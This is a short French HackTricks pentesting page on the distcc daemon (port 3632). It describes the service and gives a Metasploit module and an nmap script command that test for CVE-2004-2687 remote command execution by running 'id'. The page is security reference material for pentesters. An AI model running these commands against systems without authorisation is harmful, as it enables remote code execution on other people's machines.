3632 - Pentesting distcc

Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)!

Autres façons de soutenir HackTricks:

Informations de base

Distcc est un outil qui améliore le processus de compilation en utilisant la puissance de traitement inutilisée d'autres ordinateurs du réseau. Lorsque distcc est configuré sur une machine, cette machine est capable de distribuer ses tâches de compilation à un autre système. Ce système destinataire doit exécuter le démon distccd et doit avoir un compilateur compatible installé pour traiter le code envoyé.

Port par défaut : 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Exploitation

Vérifiez si le système est vulnérable à CVE-2004-2687 pour exécuter du code arbitraire :

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Shodan

Je ne pense pas que Shodan détecte ce service.

Ressources

Post créé par Álex B (@r1p)

Apprenez le piratage AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!

Autres façons de soutenir HackTricks:

Last updated